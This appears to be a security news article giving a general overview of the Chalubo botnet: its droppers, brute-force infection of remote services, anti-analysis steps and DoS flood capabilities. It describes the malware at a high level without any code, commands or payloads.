The Chalubo botnet is a recently discovered malware which has been found to contain advanced features from other threats and being used for DoS (denial-of-service) attack campaigns. At the moment several attacks have been sighted. Our article gives an overview of how the malware -functions.
The Chalubo Botnet Is a Formidable DoS Weapon
A new dangerous malware called the Chalubo botnet has been discovered by a team of security researchers. Several iterations of it have been found to cause infections. The first versions that are linked to it were observed back in August where three malicious components were used in an attack against x86 machines. This is attributed to be an early test attack which is probably a way for the operators to fine tune and tweak the botnet.
The Elknot dropper was later used to deliver a more complete version of the malware. The captured samples indicate that there are several variants of it available — there are specialist versions for each architecture. This makes it very effective against both servers and IoT devices.
In September a shift in the infection tactics was observed. Instead of the dropper the malicious component depended on brute force attacks against remote desktop services. The hackers loaded the infection script with the default credentials and often used username and password combinations. Updated versions of the Chalubo botnet featured advanced anti-analysis code that protected them from being discovered by both administrators and security software. This is done by launching a hardcoded script that executes the following operations:
- Firewall Bypass
- Installation of the “wget” download utility if it is not present.
- Downloading of a second-stage script
- System Modification
- Log Files Removal
What follows is the actual bot deployment. When started it will connect to a specific hacker-controlled server and report of the successful infection. The observed hacker instructions was to download other modules depending on the individual machine configuration. So far it seems that the Chalubo botnet is used to perform all basic DoS attacks — DNS, UDP and SYN floods against a given target. We anticipate that the attacks and further upgrades to its code base will continue. As the botnet is based on scripts and publicly available source code there is the possibility that it will be sold or traded on the underground hacker marketplaces. As such offspring versions can include more dangerous modules.